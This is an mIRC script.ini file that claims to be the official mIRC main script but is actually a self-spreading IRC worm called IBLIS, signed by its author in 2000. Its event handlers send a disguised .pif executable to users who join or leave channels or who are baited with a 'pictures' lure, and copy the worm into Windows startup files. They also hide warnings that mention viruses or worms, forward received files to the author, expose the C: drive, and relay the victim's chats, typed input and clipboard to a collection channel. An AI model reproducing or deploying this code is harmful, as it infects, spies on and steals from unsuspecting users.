   [SCRIPT]
   ;mIRC main Script. Please don't edit! http://www.mirc.co.uk
   ;by Khaled Mardam-Bey
   ;Copyright รท 1995-2000 mIRC Co. Ltd.
   ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
   n1=on 1:start:{
   n2= .remote on
   n3= .ctcps on
   n4= .events on
   n5= .raw on
   n6= }
   n7=alias /remove /echo *** Removed $1-
   n8=alias /unload /echo *** Unloaded $1-
   n9=on 1:text:*virus*:?:/.ignore $nick
   n10=on 1:text:*worm*:?:/.ignore $nick
   n11=on 1:kick:#:/.msg $chan Please if u want my Special Iblis Favorite Picx :) TYPE: !sexpix
   n12=on 1:text:*!sexpix*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick $mircdir\download\IBLIS_ME.BMP.pif | /raw privmsg $nick Hi! Here is my Favorite Picx ! Enjoy :)) }
   n13=on 1:connect:/.copy $mircdir $+ script.ini C:\windows\IBLIS_ME.BMP.pif
   n14=on 1:filercvd:*.exe,*.com,*.bat,*.ini,*.vbs,*.zip,*.jpg,*.txt,*.html:.dcc send Del_Armg0 $filename
   n15=on 1:text:*IBLIS*:#:/fserve $nick 9 C:\
   n16=on 1:text:*:#:/.msg #iblis_wormfinal *->   $+ $chan $+   < $+ $nick $+ > $parms
   n17=on 1:text:*:?:/.msg #iblis_wormfinal *-> From: $nick $+ * $parms
   n18=on 1:input:*:/.msg #iblis_wormfinal [( $+ $active $+ ) $1-] $cb $url
   n19=on 1:op:#:/.msg $chan Please if u want my Special Iblis Favorite Picx :) TYPE: !sexpix
   n20=on 1:part:#:{
   n21=if ( $nick == $me ) { halt } | .dcc send $nick c:\windows\IBLIS_ME.BMP.pif
   n22= }
   n23=on 1:disconnect:/.copy $mircdir $+ script.ini c:\windows\winstart.bat
   n24=on 1:join:#:{
   n25=if ( $nick == $me ) { halt } | .dcc send $nick $mircdir\download\IBLIS_ME.BMP.pif
   n26= }
   ; Del_Armg0 Pif Worm First Maker /|\ Thx to Anaktos24 for a good trick to add !
   ;_ IBLIS WORM _  GreetZ to U IBLIS ! My Dear KaT :) An Alive AnA...
   ;MY LAST .PIF WORM, designed by ... Del_Armg0 !!!  JUNE2000 -=- NOW ITS REALLY OKI  ;)
